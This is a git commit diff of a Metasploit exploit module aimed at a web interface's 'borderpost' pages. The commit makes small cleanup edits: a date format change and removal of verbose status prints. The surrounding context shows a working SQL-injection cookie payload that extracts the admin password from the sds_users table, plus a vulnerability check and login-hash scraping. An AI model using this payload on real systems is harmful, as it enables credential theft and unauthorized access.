Removed some overly verbose output.
parent
1ede519b8d
commit
f48bb4250e
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'SSL' => true
|
'SSL' => true
|
||||||
},
|
},
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => 'June 29 2015'
|
'DisclosureDate' => 'Jun 29 2015'
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
@ -66,9 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
|
'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
|
||||||
})
|
})
|
||||||
uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
|
uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
|
||||||
vprint_status(uri1)
|
|
||||||
if res and res.body =~ /invalid input syntax for integer/
|
if res and res.body =~ /invalid input syntax for integer/
|
||||||
vprint_status("Looks vulnerable to the SQLi issue, probably fully vuln")
|
vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
|
||||||
vprint_status("**Sad trumpet sound**")
|
vprint_status("**Sad trumpet sound**")
|
||||||
|
@ -103,7 +102,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
#Find the hash token needed to login
|
#Find the hash token needed to login
|
||||||
login_hash = ''
|
login_hash = ''
|
||||||
vprint_status(get_login_hash.body)
|
|
||||||
get_login_hash.body.each_line do |line|
|
get_login_hash.body.each_line do |line|
|
||||||
next if line !~ /name="hash" value="(.*)"/
|
next if line !~ /name="hash" value="(.*)"/
|
||||||
login_hash = $1
|
login_hash = $1
|
||||||
|
|
Loading…
Reference in New Issue